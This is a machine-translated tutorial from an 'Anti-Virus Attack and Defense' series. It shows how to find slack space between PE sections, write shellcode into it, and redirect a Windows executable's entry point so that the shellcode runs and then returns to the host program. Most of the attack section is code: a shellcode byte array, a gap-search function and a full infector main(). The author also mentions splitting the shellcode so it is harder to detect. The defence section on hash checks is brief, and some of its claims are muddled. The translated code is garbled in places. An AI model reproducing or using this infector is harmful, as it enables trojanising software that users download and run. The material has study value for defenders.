Anti-Virus Attack and Defense study article 004th: Code implantation using gaps

I. Preface

Nowadays, many websites provide download of various types of software, which provides a good opportunity for hackers to implant viruses and Trojans. Hackers can implant their own malicious programs into normal programs and then publish them to the website. In this way, when users download and run programs that implant viruses, the computer will be poisoned, in addition, viruses may then infect other programs in the computer, or even spread over the network or USB flash drive, expanding the spread area. This article analyzes the implementation principle of virus infection. First, you need to search for gaps in normal programs for "virus" (simulated by dialog box) implantation, then infect the target program to start the virus. Of course, after the discussion, I will still analyze how to deal with such attacks. This is the focus of this article.

 

2. Search for gaps in the program.

If you want to write code to a normal program, you must first know whether the target program has enough space to implant the code. Generally, there are two methods. The first method is to add a partition so that there is enough space for virus implantation. However, this is not conducive to virus hiding, like telling antivirus engineers that "I Am a virus", even so, I will still discuss this method in subsequent articles. The second method is to find the gaps in the program and then implant the code. In PE files, for the sake of alignment, there must be unused space between the Section and the Section, which is the gap in the program. As long as the length of the malicious code is not greater than the gap length, the code can be written into this space. The implementation of this method is discussed here.

For the sake of simplicity, I still use the shellcode written in the previous article. Different from the method discussed in the previous article, the shellcode was written to the password file last time. After the password verification program reads the password file, it overflows and executes shellcode, then run the virus program. This saves intermediate steps and directly writes the shellcode into a normal program. The running program runs the "virus" directly, which is more concealed and easily triggered. Extract the previous shellcode and make some modifications. The definition is as follows:

char shellcode[] =        "\x33\xdb"                       //xor  ebx,ebx        "\x53"                           //push ebx        "\x68\x2e\x65\x78\x65"           //push 0x6578652e        "\x68\x48\x61\x63\x6b"           //push 0x6b636148        "\x8b\xc4"                       //mov  eax,esp         "\x53"                           //push ebx        "\x50"                           //push eax        "\xb8\x31\x32\x86\x7c"           //mov  eax,0x7c863231        "\xff\xd0"                       //call eax         "\xb8\x90\x90\x90\x90"           //mov  eax,OEP        "\xff\xe0\x90";                  //jmp  eax

It should be noted that, as we will change the entry point of the program to the entry point of shellcode, after shellcode is executed, we need to jump back to the entry point of the original program, therefore, the mov and JMP eax commands are added after the original shellcode. There are four bytes behind mov for writing to the OEP of the original program. The next step is to jump to the original program for execution. Because the original shellcode contains exit code, you also need to remove the shellcode that calls exitprocess.

The code for searching gaps in a program is as follows:

DWORD searchspace (lpvoid lpbase, export pntheader) {pimage_section_header psec = (pimage_section_header) (byte *) & (pntheader-> optionalheader) + pntheader-> fileheader. sizeofoptionalheader); DWORD dwaddr = psec-> pointertorawdata + psec-> sizeofrawdata-sizeof (shellcode); dwaddr = (DWORD) (byte *) lpbase + dwaddr; // allocate shellcode size space in the memory and fill lpvoid Lp = malloc (sizeof (shellcode) with 0; memset (LP, 0, sizeof (shellcode )); while (dwaddr> psec-> Misc. virtualsize) {// The length of the query is the same as that of shellcode, And the content is 00. Int nret = memcmp (lpvoid) dwaddr, LP, sizeof (shellcode )); // if such a space exists, the value of memcmp is 0, and dwaddr if (nret = 0) {return dwaddr;} // auto-Subtract, continuously reverse query dwaddr --;} Free (LP); Return 0 ;}

The above code searches in the middle of the Code section area next to the Code section area, and starts reverse search from the end of the Code section area.

 

3. implant shellcode into the target program

Here we need to write a main function to call the above function. The Code is as follows:

# Include <windows. h> # define FILENAME "helloworld.exe" // name of the file to be infected int main () {handle hfile = NULL; handle hmap = NULL; lpvoid lpbase = NULL; hfile = createfile (filename, generic_read | generic_write, file_share_read, null, open_existing, file_attribute_normal, null); hmap = createfilemapping (hfile, null, page_readwrite, 0, 0 ); lpbase = mapviewoffile (hmap, file_map_read | file_map_write, 0, 0); pimage_dos _ Header pdosheader = (pimage_dos_header) lpbase; pimage_nt_headers pntheader = NULL; // verify the PE file to determine whether e_magic is MZ if (pdosheader-> e_magic! = Image_dos_signature) {unmapviewoffile (lpbase); closehandle (hmap); closehandle (hfile); Return 0 ;}// locate the signature flag position pntheader = (pimage_nt_headers) based on e_lfanew) (byte *) lpbase + pdosheader-> e_lfanew); // verify the PE file to determine whether signature is MZ if (pntheader-> signature! = Image_nt_signature) {unmapviewoffile (lpbase); closehandle (hmap); closehandle (hfile); Return 0 ;}// search for gaps in PE files DWORD dwaddr = searchspace (lpbase, pntheader ); // find the original program entry address and copy it to the corresponding location in shellcode (25 to 28 bytes) DWORD dwoep = pntheader-> optionalheader. imagebase + pntheader-> optionalheader. addressofentrypoint; * (DWORD *) & shellcode [25] = dwoep; // copy shellcode to the Gap memcpy (char *) dwaddr, shellcode, strlen (shellcode) found above) + 3); dwaddr = dwaddr-(DWORD) (byte *) lpbase; // copy the shellcode entry address to the original program pntheader-> optionalheader. addressofentrypoint = dwaddr; unmapviewoffile (lpbase); closehandle (hmap); closehandle (hfile); Return 0 ;}

Because I need to implant shellcode into an executable file and only the executable file can start shellcode, it is necessary to detect the format of the target file in advance. The detection method is generally to check whether MZ and PE flags exist. One thing to note here is that the memcpy function is used in the statement that copies shellcode to the gap. Its third parameter is strlen (shellcode) + 3, the reason for adding 3 here is that when the strlen function encounters the \ x00 character in the string, it will think that the string has ended, and the length of the string will be counted at \ x00. The OEP of a program is often 0x004xxxxx. The small end shows that the storage method of the program is xxxxx400. In my shellcode, the last three bytes are not recognized by strlen because there are three remaining bytes (\ xFF \ xe0 \ x90) after 00, but are truncated by 00, therefore, you need to add 3 more.

 

4. Program "infection"

To test our "Infected" program, I will write another helloworld program with the following code:

#include <stdio.h>int main(){        printf(“Hello world!\n”);        getchar();        return 0;}

Put the helloworld.exeprogram generated after the code compilation link in the same directory as the "infected" program, execute the "infected" program, and then open helloworld.exe with the hexadecimal editing software. We can see that our code has been implanted, as shown below:

Figure 1 view embedded code with hex Editor

Use ollydbg to view the Implant code:

Figure 2 Use ollydbg to view the embedded code

When the OD is used to load the program, the address of the shellcode we implanted is directly displayed. It can be seen that the original OEP of the program has been modified. At the end of shellcode, it will jump to the original entry point of the program and continue to execute the original program. Peid can also be used to clearly see the differences before and after "infection:

Figure 3 before being infected

Figure 4 after being infected

Dependencies, as shown in:

Figure 5 run the "Infected" program

The dialog box for simulated viruses and the programs of helloworld.exe have been run, which also shows that "infection" is successful.

Here we directly change the entry point of the program to the entry address of our shellcode. In fact, this is not conducive to the hiding of "virus", in order to play a confusing role, we can implant the shellcode program into the helloworld code, or even split the shellcode into several parts and then implant it. This makes it hard to be discovered and will not be discussed in detail here.

 

5. Discussion on preventive measures

Because the malicious program's "infected" method embeds its own code in the program gap, it will not change the size of the original program, of course, this is also because the example I mentioned is relatively simple and shellcode is relatively short. This more or less achieves virus hiding, but there are still some preventive methods. Generally, software companies verify their own software products, such as using MD5, SHA-1, or CRC32. The verification results are unique. That is to say, even if the original program changes a little (for example, only 32 bytes of content is modified this time), the verification results will be different. Prepare or some DLL files, and such important files will officially provide real verification values, so we can easily find whether these files have been tampered. Go back to your helloworld.exe and check with the eye of fire before and after "infection:

Figure 6 before "infection"

Figure 7 after "infection"

We recommend that you use multiple verification methods for verification. Because MD5 verification methods may be used, the results before and after infection may be the same, however, the current technology cannot change the verification results of all verification methods without modifying the original file. Therefore, good at using the verification method can protect your computer from many threats.

For this attack method, I am not planning to write a killing tool this time. After all, relying on the previous killing tool is enough. Removing an infected file is troublesome. We will not discuss it here. This issue may be discussed in future articles.

 

Vi. Summary

This article briefly discusses how to implant shellcode using gaps in the PE structure. In my opinion, PE knowledge is the foundation of many advanced technologies and must be mastered. In future articles, we will explain how to use the PE format to implement "virus" attacks and prevent them from more perspectives. I once again stressed that the purpose of my discussion here is to allow everyone to learn more about computer security, rather than apply this to improper practices. The methods I have mentioned cannot pass the soft test. Even in this infected program, the "Eye of Fire" still lists it as a key suspect. Therefore, you should not make your regret for the sake of quick moments.

Anti-Virus Attack and Defense study article 004th: Code implantation using gaps